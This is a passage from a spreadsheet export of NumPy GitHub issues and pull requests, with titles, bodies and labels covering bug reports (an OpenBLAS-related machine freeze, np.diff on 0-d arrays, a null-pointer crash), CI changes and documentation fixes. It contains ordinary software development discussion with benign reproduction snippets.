`conda install nomkl numpy scipy scikit-learn numexpr`_x000D_
`conda remove mkl mkl-service`_x000D_
_x000D_
And only then use this code in  my Jupyter notebooks (or in the Python terminal): _x000D_
```_x000D_
import os_x000D_
os.environ['OPENBLAS_CORETYPE']='Haswell'_x000D_
```_x000D_
It is a "partial" solution because I just discovered (yesterday) that if I use the Python Igraph package, the computer starts again to freeze/reboot. I know nothing about programming etc as you guys. So I'm sorry if I'm reporting here in a wrong way. I don't know where else to report (I was even not aware of the difference between BLAS and OpenBLAS...). Since this started before removing the mkl versions etc, I suppose I should report here as well because is not only a problem in openBLAS (I suppose I'm using openBLAS only after conda install nonmkl etc)._x000D_
_x000D_
_x000D_
### Error message:_x000D_
_x000D_
I have no error messages. The 18cores computer just completely freezes for 5-10 seconds, and then reboot. Sometimes (but not always), it was freezing/reboot with a simple `np.__version__`._x000D_
_x000D_
Note 2: the connection between using `os.environ['OPENBLAS_CORETYPE']='Haswell'` and not using it has been completely deterministic. For example, just after a freeze/reboot, I can run the same code (but now running this command as the first one) and the computer works fine. It will work even with joblib and all the 18 cores at 100%. So, the computer can be cold or hot, and the only requirement to freeze/reboot is running or not the code above. (Note: yesterday, by using IGraph, it will freeze/reboot anyway...). _x000D_
_x000D_
### Numpy/Python version information:_x000D_
 The current output from `print(numpy.__version__, sys.version)` (**i9-7980XE** 18 cores cpu): _x000D_
_x000D_
 1.16.2 3.7.3 (default, Mar 27 2019, 22:11:17)  [GCC 7.3.0]_x000D_
_x000D_
Note 3: this output is the same as the other computer ( **i7-7700** 4 cores cpu), which has no problems (so, it uses the mkl versions of numpy)._x000D_
_x000D_
Thank you all in advance!_x000D_
</t>
  </si>
  <si>
    <t>BUG: Numpy freezes/reboot on a i9-7980XE 18cores machine</t>
  </si>
  <si>
    <t>['00 - Bug', '29 - Intel/Anaconda', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
_x000D_
Referencing #13296 _x000D_
_x000D_
Added TypeError message in np.diff for handling 0-dimensional ndarrays._x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>ENH: Added clearer exception for np.diff on 0-dimensional ndarray</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
Saving numpy array subsampled by multi-field indexing fails._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
x = np.array([(1,2,3),(4,5,6)], dtype=[('foo', 'i8'), ('bar', 'f4'), ('yee', 'f4')])_x000D_
np.savetxt('out.txt', x[['foo', 'yee']])_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
TypeError: Mismatch between array dtype ('{'names':['foo','yee'], 'formats':['&lt;i8','&lt;f4'], 'offsets':[0,12], 'itemsize':16}') and format specifier ('%.18e %.18e %.18e')_x000D_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('1.16.2', '2.7.16 |Anaconda, Inc.| (default, Mar 14 2019, 21:00:58) \n[GCC 7.3.0]')_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>np.savetxt bug on structured array</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
np.diff throws axis exception for 0-dimensional arrays. Is this the default behaviour? Shouldn't it just return the array as it is?_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
foo = np.array(1.11111111111, np.float64)_x000D_
print(foo.ndim)_x000D_
print(np.diff(foo))_x000D_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`Traceback (most recent call last):_x000D_
  File "/Users/navneetmadhukumar/Downloads/pytorch-maml-rl/main.py", line 212, in &lt;module&gt;_x000D_
    print(np.diff(foo))_x000D_
  File "/Users/navneetmadhukumar/anaconda3/envs/rllab3/lib/python3.5/site-packages/numpy/lib/function_base.py", line 1241, in diff_x000D_
    axis = normalize_axis_index(axis, nd)_x000D_
numpy.AxisError: axis -1 is out of bounds for array of dimension 0`_x000D_
_x000D_
&lt;!-- Full error message, if any (starting from line Traceback: ...) --&gt;_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.0 3.5.2 |Continuum Analytics, Inc.| (default, Jul  2 2016, 17:52:12) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 4.2 (clang-425.0.28)]_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Throw clearer exception for np.diff on 0-dimensional ndarray</t>
  </si>
  <si>
    <t>Add version information to the error message when import fails. Also shorten the message and de-emphasize build failures from a git checkout</t>
  </si>
  <si>
    <t>DOC: add more info to failure message</t>
  </si>
  <si>
    <t>Update numpydoc to the latest upstream version, which supports `autoclass`. This is needed for #13163 randomgen documentation</t>
  </si>
  <si>
    <t>DOC: update numpydoc to latest master</t>
  </si>
  <si>
    <t xml:space="preserve">Warnings:_x000D_
_x000D_
```_x000D_
x86_64-conda_cos6-linux-gnu-cc: numpy/core/src/npymath/npy_math.c_x000D_
numpy/core/src/npymath/npy_math_complex.c.src: In function 'npy_casinhf':_x000D_
numpy/core/src/npymath/npy_math_complex.c.src:1445:21: warning: unused variable 'pio2_hi' [-Wunused-variable]_x000D_
     const @type@ pio2_hi = NPY_PI_2@c@;_x000D_
                     ^~~~~~~_x000D_
numpy/core/src/npymath/npy_math_complex.c.src:1434:30: warning: unused variable 'pio2_lo' [-Wunused-variable]_x000D_
     const volatile npy_float pio2_lo = 7.5497899549e-9f;_x000D_
                              ^~~~~~~_x000D_
numpy/core/src/npymath/npy_math_complex.c.src: In function 'npy_casinh':_x000D_
numpy/core/src/npymath/npy_math_complex.c.src:1445:22: warning: unused variable 'pio2_hi' [-Wunused-variable]_x000D_
     const @type@ pio2_hi = NPY_PI_2@c@;_x000D_
                      ^~~~~~~_x000D_
numpy/core/src/npymath/npy_math_complex.c.src:1438:31: warning: unused variable 'pio2_lo' [-Wunused-variable]_x000D_
     const volatile npy_double pio2_lo = 6.1232339957367659e-17;_x000D_
                               ^~~~~~~_x000D_
numpy/core/src/npymath/npy_math_complex.c.src: In function 'npy_casinhl':_x000D_
numpy/core/src/npymath/npy_math_complex.c.src:1445:26: warning: unused variable 'pio2_hi' [-Wunused-variable]_x000D_
     const @type@ pio2_hi = NPY_PI_2@c@;_x000D_
                          ^~~~~~~_x000D_
numpy/core/src/npymath/npy_math_complex.c.src:1442:35: warning: unused variable 'pio2_lo' [-Wunused-variable]_x000D_
     const volatile npy_longdouble pio2_lo = 2.710505431213761085e-20l;_x000D_
                                   ^~~~~~~_x000D_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</si>
  <si>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fix unused variable warning in npy_math_complex.c.src</t>
  </si>
  <si>
    <t>`[ci skip]` `[skip ci]`_x000D_
_x000D_
tl;dr @hameerabbasi and myself have funded time to work on NumPy, which qualifies Quansight Labs as an institutional partner_x000D_
_x000D_
I'll post a message to the mailing list related to this.</t>
  </si>
  <si>
    <t>DOC: add Quansight Labs as an Institutional Partner</t>
  </si>
  <si>
    <t xml:space="preserve">As requested in #12586._x000D_
</t>
  </si>
  <si>
    <t>Add benchmark for sorting random array.</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: benchmarks']</t>
  </si>
  <si>
    <t xml:space="preserve">When running an accumulator (for example with `np.add.at`) then the length of the `indices` must be fewer than 2**32 elements.  Otherwise, the accumulator only uses the first `np.int32(indices.size)` elements in the accumulator.  This fails on all numpys up to and including 1.16.2._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
Note that the following code needs to be run on a computer with a *lot* of memory, &gt;~ 64Gb._x000D_
_x000D_
This code does not work.  Expectation is that `inds.size` is the same as `accum.sum()`, which is not true.  You might notice that `accum` is mostly 0s._x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
print(np.__version__)_x000D_
np.random.seed(12345)_x000D_
_x000D_
arr = np.arange(1000)_x000D_
inds = np.random.choice(arr, size=2**32 - 1)_x000D_
print(inds.size)_x000D_
_x000D_
accum = np.zeros(arr.size, dtype=np.int64)_x000D_
np.add.at(accum, inds, 1)_x000D_
np.testing.assert_equal(accum.sum(), inds.size)_x000D_
```_x000D_
The following code does work, and seems to be the largest size that does:_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
print(np.__version__)_x000D_
np.random.seed(12345)_x000D_
_x000D_
arr = np.arange(1000)_x000D_
inds = np.random.choice(arr, size=2**31 - 1)_x000D_
print(inds.size)_x000D_
_x000D_
accum = np.zeros(arr.size, dtype=np.int64)_x000D_
np.add.at(accum, inds, 1)_x000D_
_x000D_
np.testing.assert_equal(accum.sum(), inds.size)_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
There is no error logged from numpy , the answer is simply wrong.  In the test code:_x000D_
```_x000D_
AssertionError: _x000D_
Items are not equal:_x000D_
 ACTUAL: 0_x000D_
 DESIRED: 4294967295_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.2 3.7.2 (default, Dec 29 2018, 06:19:36) _x000D_
[GCC 7.3.0]_x000D_
</t>
  </si>
  <si>
    <t>Universal function `at` `indices` must have fewer than 2**31 elements or else they are ignored</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13273._x000D_
_x000D_
Fixes crash in the following code:_x000D_
```python_x000D_
import numpy_x000D_
class T:_x000D_
    __array_interface__ = {}_x000D_
numpy.array([T()])_x000D_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</si>
  <si>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null pointer dereference in PyArray_DTypeFromObjectHelper</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
Closes #10803 _x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC: Document caveat in random.uniform</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12547._x000D_
_x000D_
Cast the covariance in the multivariate normal to double_x000D_
so that the interpretation of tol is cleaner._x000D_
_x000D_
closes #10839_x000D_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</si>
  <si>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Cast covariance to double in random mvnormal</t>
  </si>
  <si>
    <t>['01 - Enhancement', '08 - Backport', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13176._x000D_
_x000D_
According to #13165 there's a reference count error when invalid inputs are given to ndarray.flat. The fix is to remove a superfluous Py_DECREF call in the invalid input case._x000D_
_x000D_
My reasoning for the fix is that here we get a new reference to the new dtype as indtype, but in case of blatantly invalid input (say, None or a string) we only enter this block and then next we decrease the refcount of indtype. I believe the bug was caused by the double deallocation together with the final Py_XDECREF call at the end. The else branch I removed was only tripped in cases where the input was invalid (otherwise we either return from the corresponding if branch or jump to the fail label from there). In every valid case we return with either calling Py_DECREF(indtype) exactly once or passing on its reference, and in non-trivially-invalid cases we used to skip the now-removed else branch._x000D_
_x000D_
I intended to add a regression test as suggested by @seberg, but the bug causes a reference count error to be printed after the interpreter finishes. I don't know how I could test this (the IndexError is raised fine so a test would conclude just fine)._x000D_
_x000D_
Fixes gh-13165, where a double decref could occur on the error path._x000D_
_x000D_
Folded into this commit is some related control flow cleanup requested at review time._x000D_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</si>
  <si>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MAINT: fix reference count error on invalid input to ndarray.flat</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13269._x000D_
_x000D_
The warning_x000D_
_x000D_
[...]/fortranobject.c:138:18: warning: comparison of integers of different signs:_x000D_
'Py_ssize_t' (aka 'long') and 'unsigned long' [-Wsign-compare]_x000D_
if (size &lt; sizeof(notalloc)) {_x000D_
                ~~~~ ^ ~~~~~~~~~~~~~~~~_x000D_
_x000D_
occurs 17 times when scipy is built.  The change in this pull request_x000D_
casts `size` to `size_t` before comparing it to `sizeof(...)`.  A_x000D_
previous check has already eliminated the possibility that `size` is_x000D_
negative, so this cast is safe._x000D_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</si>
  <si>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f2py: Add a cast to avoid a compiler warning.</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', '08 - Backport', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Fixes crash in the following code:
```python
import numpy
class T:
    __array_interface__ = {}
numpy.array([T()])
```</t>
  </si>
  <si>
    <t>BUG: Fix null pointer dereference in PyArray_DTypeFromObject</t>
  </si>
  <si>
    <t>This is the ARMv8 equivalent to #13264 -- [build script](https://github.com/tylerjereddy/openblas-static-gcc/blob/master/ARMv8/build_openblas.sh)_x000D_
_x000D_
Checked Shippable output on my fork first</t>
  </si>
  <si>
    <t>TST: use OpenBLAS v0.3.5 for ARMv8 CI</t>
  </si>
  <si>
    <t xml:space="preserve">The warning_x000D_
_x000D_
    [...]/fortranobject.c:138:18: warning: comparison of integers of different signs: 'Py_ssize_t' (aka 'long') and 'unsigned long' [-Wsign-compare]_x000D_
            if (size &lt; sizeof(notalloc)) {_x000D_
                ~~~~ ^ ~~~~~~~~~~~~~~~~_x000D_
_x000D_
occurs 17 times when scipy is built.  The change in this pull request casts_x000D_
`size` to `size_t` before comparing it to `sizeof(...)`.  A previous check_x000D_
has already eliminated the possibility that `size` is negative, so this cast_x000D_
is safe._x000D_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</si>
  <si>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MAINT: f2py: Add a cast to avoid a compiler warning.</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Fixes #12862, since recent core dev discussions have favored skipping this on 32-bit Linux._x000D_
_x000D_
A few core devs have likely sunk too much time into trying to debug this sporadic failure, which only affects 32-bit Linux on the NumPy wheels repo._x000D_
_x000D_
Sadly, our dev CI is not sensitive to this, but the failed build logs availble in the linked issue should make the identity of the problem test clear to a reviewer._x000D_
_x000D_
Technically, we could also have a finer-grained skip that only operates on the complex64 dtype or even just relaxes the precision requirement for linux 32-bit. Not sure it is worth the energy though.</t>
  </si>
  <si>
    <t>TST: skip TestPinv 32-bit</t>
  </si>
  <si>
    <t>['05 - Testing', '57 - Close?']</t>
  </si>
  <si>
    <t xml:space="preserve">Running from numpy source directory._x000D_
/usr/lib64/python3.6/distutils/dist.py:261: UserWarning: Unknown distribution option: 'define_macros'_x000D_
  warnings.warn(msg)_x000D_
Traceback (most recent call last):_x000D_
  File "setup.py", line 415, in &lt;module&gt;_x000D_
    setup_package()_x000D_
  File "setup.py", line 407, in setup_package_x000D_
    setup(**metadata)_x000D_
  File "/builddir/build/BUILD/numpy-1.16.2/numpy/distutils/core.py", line 171, in setup_x000D_
    return old_setup(**new_attr)_x000D_
  File "/usr/lib/python3.6/site-packages/setuptools/__init__.py", line 129, in setup_x000D_
    return distutils.core.setup(**attrs)_x000D_
  File "/usr/lib64/python3.6/distutils/core.py", line 148, in setup_x000D_
    dist.run_commands()_x000D_
  File "/usr/lib64/python3.6/distutils/dist.py", line 955, in run_commands_x000D_
    self.run_command(cmd)_x000D_
  File "/usr/lib64/python3.6/distutils/dist.py", line 974, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "/builddir/build/BUILD/numpy-1.16.2/numpy/distutils/command/install.py", line 62, in run_x000D_
    r = self.setuptools_run()_x000D_
  File "/builddir/build/BUILD/numpy-1.16.2/numpy/distutils/command/install.py", line 36, in setuptools_run_x000D_
    return distutils_install.run(self)_x000D_
  File "/usr/lib64/python3.6/distutils/command/install.py", line 568, in run_x000D_
    self.run_command(cmd_name)_x000D_
  File "/usr/lib64/python3.6/distutils/cmd.py", line 313, in run_command_x000D_
    self.distribution.run_command(command)_x000D_
  File "/usr/lib64/python3.6/distutils/dist.py", line 974, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "/builddir/build/BUILD/numpy-1.16.2/numpy/distutils/command/install_data.py", line 19, in run_x000D_
    self.run_command('install_clib')_x000D_
  File "/usr/lib64/python3.6/distutils/cmd.py", line 313, in run_command_x000D_
    self.distribution.run_command(command)_x000D_
  File "/usr/lib64/python3.6/distutils/dist.py", line 974, in run_command_x000D_
    cmd_obj.run()_x000D_
  File "/builddir/build/BUILD/numpy-1.16.2/numpy/distutils/command/install_clib.py", line 34, in run_x000D_
    source = os.path.join(build_dir, name)_x000D_
  File "/usr/lib64/python3.6/posixpath.py", line 80, in join_x000D_
    a = os.fspath(a)_x000D_
TypeError: expected str, bytes or os.PathLike object, not NoneType_x000D_
</t>
  </si>
  <si>
    <t>1.16.2 build fails with python 3.6 on install stage</t>
  </si>
  <si>
    <t>['component: numpy.distutils']</t>
  </si>
  <si>
    <t>We currently use the system ATLAS for our `ppc64le` Travis CI builds. This PR switches the backend to match our OpenBLAS-based wheels, for example._x000D_
_x000D_
For reviewers:_x000D_
- the [POWER8 build script](https://github.com/tylerjereddy/openblas-static-gcc/blob/master/power8/build_openblas.sh) produces a tarball that is currently stored manually on my Dropbox--suggestions for putting this somewhere more robust (i.e, the rackspace we use for MacPython)? and with what credentials to upload there (usually API secret key through Travis, so not sure)?_x000D_
- please check that you agree with me that `OpenBLAS` is indeed being used as the backend for that matrix entry now_x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
The OpenBLAS for POWER8 is not yet statically linked to the gcc / gfortran runtime--we likely need access to [`libgfortran.a` built with `-fPIC`](https://github.com/JuliaLang/julia/issues/326#issuecomment-191781005) on the GCC compile farm. Anyway, none of our other platform OpenBLAS builds on MacPython are statically linked either._x000D_
_x000D_
&lt;/details&gt;</t>
  </si>
  <si>
    <t>TST: use OpenBLAS v0.3.5 for POWER8 CI runs</t>
  </si>
  <si>
    <t>Issue #9535_x000D_
Correcting bug on the documentation page : Byteswapping.</t>
  </si>
  <si>
    <t>DOC : Correcting bug on Documentation Page (Byteswapping)</t>
  </si>
  <si>
    <t>Since reading is a fast process, having two consecutive sentences, one ending with maths and the next one starting with maths, can make a text unnecessarily difficult to read._x000D_
At first glance, what one sees is p = 4/15 =...= 4.</t>
  </si>
  <si>
    <t>DOC: Small readability improvement</t>
  </si>
  <si>
    <t>_x000D_
Implemented the ValueError for a non-writeable array in numpy/calculation.c_x000D_
Added test for ValueError in numpy/core/tests/test_numeric.py</t>
  </si>
  <si>
    <t>BUG: Add ValueError for read-only array in clip() function #12242</t>
  </si>
  <si>
    <t xml:space="preserve">Further helps developers to not specify at least one of "a_min" or "a_max" arguments. </t>
  </si>
  <si>
    <t>ENH: Give `a_min` and `a_max` default values of None in clip function.</t>
  </si>
  <si>
    <t>For comment / note here from Chuck: https://github.com/numpy/numpy/pull/13245#issuecomment-479214934_x000D_
_x000D_
Note that a nice summary of the failed tests is showing up in that PR now, but the problem is that Azure shows green instead of red as final result._x000D_
_x000D_
We need to set `failTaskOnFailedTests` to `true` for Azure CI Publish stage to fail when one or more unit tests fail, so we get both the nice summary of failed tests, and a red "x" if there is a failure detected after publishing._x000D_
_x000D_
I didn't actually change that setting in #13217, it was already the default, but because we no longer hard fail CI when the tests fail, we do need to hard fail **after** publishing if a failure is detected._x000D_
_x000D_
If a reviewer wants to be thorough they can intentionally introduce / remove a failure here for behavioural assessment on Azure.</t>
  </si>
  <si>
    <t>TST: fail Azure CI if test failures</t>
  </si>
  <si>
    <t xml:space="preserve">When the `mode` argument to `pad` is a function, `pad` assumes that apply_along_axis modifes the padded array in-place._x000D_
_x000D_
In this case, it is more efficient to avoid the overhead of creating an output buffer (as done internally within apply_along_axis) and just directly iterate the in-place operations using `transpose` and `nditer`._x000D_
_x000D_
This PR is an alternative to #13193. Aside from `pad`, I could not find any other instances in the NumPy or SciPy codebases where `apply_along_axis` was being used with functions operating `in-place`. In that case it may not be worth extending the API of `apply_along_axis`._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Improve efficiency of pad by avoiding use of apply_along_axis</t>
  </si>
  <si>
    <t xml:space="preserve">DOC: Fix to #12261 _x000D_
</t>
  </si>
  <si>
    <t>DOC: Fix some duplicate documentation of the PyArray_SimpleNew family of functions.</t>
  </si>
  <si>
    <t>Remove excess underscores_x000D_
Fix lognormal docstring_x000D_
Standardize whitesapce_x000D_
_x000D_
Final set of small documentation fixes to correct errors and non-Python 3 content, and to help synchronize with #13163. Also useful if randomgen doesn't make 1.17.</t>
  </si>
  <si>
    <t>DOC: Improve mtrand docstrings</t>
  </si>
  <si>
    <t>Brief follow-up to https://github.com/numpy/numpy/pull/13176, following [the original comment by @mhvk](https://github.com/numpy/numpy/pull/13176#discussion_r268438828) and [an addition by @eric-wieser](https://github.com/numpy/numpy/pull/13176#issuecomment-478845724)._x000D_
_x000D_
Replace the call to `Py_SETREF` with an assignment to a dedicated `ret` array.</t>
  </si>
  <si>
    <t>MAINT: replace SETREF with assignment to ret array in ndarray.flat</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
Corrected the mistake in the docstring for floor_divide: change 'b' to 'a'._x000D_
However, my IDE has also deleted the unnecessary spaces. Is it ok, or should I delete it?_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC: fix docstring for floor_divide</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
This PR updates docstrings in numpy/ma/core.py for 'filled' and 'MaskedArray' functions. More specifically, it specifies that fill_value attribute can be of any shape._x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC: updated docstrings in numpy/ma/core.py</t>
  </si>
  <si>
    <t>DOC: Minor grammatical fixes in NumPy docs</t>
  </si>
  <si>
    <t>Updates Document mentions that PyArray_GetField steals a reference to its descr argument_x000D_
along with the meaning of steals to reference.</t>
  </si>
  <si>
    <t>DOC: mention PyArray_GetField steals a reference</t>
  </si>
  <si>
    <t xml:space="preserve">Issue #10585_x000D_
Updating the definition of PyArray_Descr according to the [full definition](https://github.com/numpy/numpy/blob/master/numpy/core/include/numpy/ndarraytypes.h#L591-L651)_x000D_
</t>
  </si>
  <si>
    <t>DOC : PyArray_Descr.names undocumented</t>
  </si>
  <si>
    <t xml:space="preserve">Closes #13230 </t>
  </si>
  <si>
    <t>DOC: Change the required Sphinx version to build documentation</t>
  </si>
  <si>
    <t>As of now, the guide to build the numpy docs [here](https://www.numpy.org/devdocs/docs/howto_build_docs.html) mentions the minimum Sphinx version required to be 1.0.1, however it throws an error which is due to 1.0.1 being an outdated version._x000D_
### Reproducing code example:_x000D_
Run `make html` in `numpy/doc` directory_x000D_
### Error message:_x000D_
`sphinx-build: error: unrecognized arguments: --keep-going`_x000D_
_x000D_
Hence we need to change the minimum required version in the docs.</t>
  </si>
  <si>
    <t>Change required Sphinx version to build docs</t>
  </si>
  <si>
    <t>DOC: Add contributor tips.</t>
  </si>
  <si>
    <t>I've seen multiple questions now of the form "why does this give a MemoryError" when the reason is the user ended up allocating a bigger array than expected._x000D_
_x000D_
It would be helpful to include the shape and dtype in the error message.</t>
  </si>
  <si>
    <t>Indicate attempted allocation size when constructing an array gives a MemoryError</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.core', 'defunct — difficulty: Intermediate']</t>
  </si>
  <si>
    <t xml:space="preserve">`repeat` can take an array of numbers as value for it's `repeat`_x000D_
argument. The error message if one of these is negative is `count &lt; 0`._x000D_
The first time I encountered this, I did not understand the error since_x000D_
this message is somewhat cryptic and uninformtiave. Replace it by_x000D_
something better._x000D_
</t>
  </si>
  <si>
    <t>Improve error message for negative valued argument</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
Related to #12385 _x000D_
The checklist for future work on this PR is as follows:_x000D_
Deprecate - _x000D_
- [x] 'mafromtxt`_x000D_
- [x] 'ndfromtxt'_x000D_
_x000D_
@rgommers Please review and let me know the required changes. Thanks a lot!_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC: Document/ Deprecate functions exposed in "numpy" namespace</t>
  </si>
  <si>
    <t xml:space="preserve">This PR adds an `nan` compatible analog function to `ptp`: `nanptp`_x000D_
_x000D_
Do let me know if there are any areas for improvement. _x000D_
</t>
  </si>
  <si>
    <t>ENH: adding new function, `np.nanptp`</t>
  </si>
  <si>
    <t>[This was #9355 ]_x000D_
_x000D_
As I removed my local repo since #9355 was sent I send a new PR._x000D_
_x000D_
Sorry if this is not the canonical way. I tried to push to the old PR but I haven't found the way :disappointed: _x000D_
_x000D_
I hope this PR makes more sense than #9355 ._x000D_
_x000D_
I've added tests to try to check if all is fine._x000D_
_x000D_
Please, let me know it all is fine or if it needs more work.</t>
  </si>
  <si>
    <t>ENH: nan_to_num keyword addition (was #9355)</t>
  </si>
  <si>
    <t>['01 - Enhancement', '56 - Needs Release Note.', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">This fixes #5610._x000D_
_x000D_
Works by adding a `PyUFunc_IsFiniteTypeResolver` for `isfinite` ufunc. It does what `PyUFunc_IsNaTTypeResolver` does for `datetime64` and `timedelta64` objects, and calls  `PyUFunc_DefaultTypeResolver` for all other dtypes._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ENH: `isfinite` support for `datetime64` and `timedelta64`</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #13210 _x000D_
_x000D_
See associated docs for [Publish Test Results](https://docs.microsoft.com/en-us/azure/devops/pipelines/tasks/test/publish-test-results?view=azure-devops&amp;tabs=yaml) and [task control options](https://docs.microsoft.com/en-us/azure/devops/pipelines/process/tasks?view=azure-devops&amp;tabs=yaml#task-control-options)._x000D_
_x000D_
The key is likely setting `continueOnError: true`, as docs suggest it should default to false--preventing the upload if tests fail. `failTaskOnFailedTests: false` should be the default, but let's be explicit on that too._x000D_
</t>
  </si>
  <si>
    <t>TST: always publish Azure tests</t>
  </si>
  <si>
    <t>The [floor_divide docs](https://docs.scipy.org/doc/numpy/reference/generated/numpy.floor_divide.html) claim that _x000D_
_x000D_
&gt; Return the largest integer smaller or equal to the division of the inputs. It is equivalent to the Python // operator and pairs with the Python % (remainder), function so that b = a % b + b * (a // b) up to roundoff._x000D_
_x000D_
However, the mathematical expression is equal to a, not equal to b._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```_x000D_
a=9; b=2; a % b + b * (a // b)  == a_x000D_
True_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Numpy docs V1.16.1</t>
  </si>
  <si>
    <t>Documentation mistake numpy.floor_divide</t>
  </si>
  <si>
    <t>&lt;!--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These have their relevant docstrings. I'll add them to the reference guide.  _x000D_
- [x] ```'compare_chararrays': 'numpy.core._multiarray_umath.compare_chararrays',```_x000D_
- [ ] ```'add_newdoc': 'numpy.core.function_base.add_newdoc',```_x000D_
- [x] ```'byte_bounds': 'numpy.lib.utils.byte_bounds',```_x000D_
- [x] ```'deprecate': 'numpy.lib.utils.deprecate',```_x000D_
- [x] ```'get_include': 'numpy.lib.utils.get_include',```_x000D_
- [x] ```'who': 'numpy.lib.utils.who',```_x000D_
_x000D_
To Deprecate: _x000D_
- [x] ```'disp': 'numpy.lib.function_base.disp',```_x000D_
- [ ] ```'recfromcsv': 'numpy.lib.npyio.recfromcsv',``` _x000D_
- [ ] ```'recfromtxt': 'numpy.lib.npyio.recfromtxt',```_x000D_
- [ ] ```'safe_eval': 'numpy.lib.utils.safe_eval'```_x000D_
- [ ] ```'Tester': 'numpy.testing._private.nosetester.NoseTester',```</t>
  </si>
  <si>
    <t>DOC: add missing routines to reference guide</t>
  </si>
  <si>
    <t>A follow-up to #11689._x000D_
_x000D_
These two sections describe the same distutils feature, but in different ways. It would be good to unify them.</t>
  </si>
  <si>
    <t>DOC: Merge together DISTUTILS.rst.txt#template-files" and distutils.rst#conversion-of-src-files</t>
  </si>
  <si>
    <t>It would be nice to take advantage of azure's ability to show failures by test. Unfortunately, we don't publish the xml file if the tests fail.</t>
  </si>
  <si>
    <t>"PublishTestResults"phase of azure does not run if tests fail</t>
  </si>
  <si>
    <t>I have included a description from the conversion-of-src fille, as well as added a link to read more about the conversion in Fortan files and non-Fortan files. What changes should I make if any?</t>
  </si>
  <si>
    <t>DOC: Merge together DISTUTILS.rst.txt#template-files" and distutils.rst#conversion-of-src-files #13129</t>
  </si>
  <si>
